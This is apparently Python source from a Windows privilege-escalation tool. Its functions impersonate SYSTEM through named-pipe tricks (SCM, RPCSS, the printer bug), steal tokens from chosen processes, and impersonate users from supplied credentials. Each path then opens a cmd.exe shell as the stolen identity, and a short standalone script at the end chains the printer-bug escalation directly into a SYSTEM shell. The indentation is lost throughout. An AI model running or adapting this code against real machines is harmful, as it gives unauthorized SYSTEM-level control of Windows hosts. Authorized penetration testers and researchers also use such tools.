def scm(args):
if args["toSystem"] == True:
printT("Try to spawn a system shell via scm & impersonation...")
esc = Escalation()
imp = Impersonate()
status = esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
imp.printCurrentThreadEffectiveToken()
if status == True:
imp = Impersonate()
imp.executeCMDWithThreadEffectiveToken()
def rpcss(args):
printT("Trying to exploit 'RPCSS'...")
printT("It can take many seconds, so wait...")
esc = Escalation()
status = esc.namedPipeImpersonationSystemViaRPCSS()
if status == True:
imp = Impersonate()
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to exploit 'RPCSS'")
def imppid(args):
if args['pid'] == None:
logging.error("A pid has to be selected")
else:
printT("Impersonating primary token of pid {0}".format(args['pid']))
imp = Impersonate()
imp.enableAllUserRights()
status = imp.impersonateViaPID(pid=args['pid'])
if status == True:
printT("Trying to open a cmd shell...")
printT(
"NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell"
)
imp.printCurrentThreadEffectiveToken()
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to impersonate")
def searchimpfirstsystem(args):
'''
Impersonate the first system token which is available and prompt a cmd.exe.
:param args:
:return: True if success, otherwise false
'''
printT("Searching and impersonating first nt authority\\system token...")
imp = Impersonate()
status = imp.searchAndImpersonateFirstSystemToken(targetPID=args['pid'],
printAllTokens=False)
if status == True:
imp.enableAllUserRights()
imp.executeCMDWithThreadEffectiveToken()
printT("cmd.exe prompt started as system")
return True
else:
logging.error("Impossible to prompt a cmd.exe as system.")
return False
def impuser(args):
if args['username'] == None or args['password'] == None:
logging.error("username or password has to be given")
else:
printT("Try to impersonate via creds...")
imp = Impersonate()
status = imp.impersonateViaCreds(
login=args['username'],
password=args['password'],
domain=args['domain'],
logonType=LOGON32_LOGON_INTERACTIVE,
logonProvider=LOGON32_PROVIDER_DEFAULT)
if status == True:
printT("Impersonation success, try to spawn a shell...")
printT(
"SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME should be required"
)
imp.printCurrentThreadEffectiveToken(printFull=True,
printLinked=False)
imp.executeCMDWithThreadEffectiveToken()
else:
logging.error("Impossible to impersonate via creds")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate esc = Escalation() esc.namedPipeImpersonationSystemViaPrinterBug() imp = Impersonate() imp.enableAllUserRights() #Not necessary but we can do it, we do it imp.executeCMDWithThreadEffectiveToken()
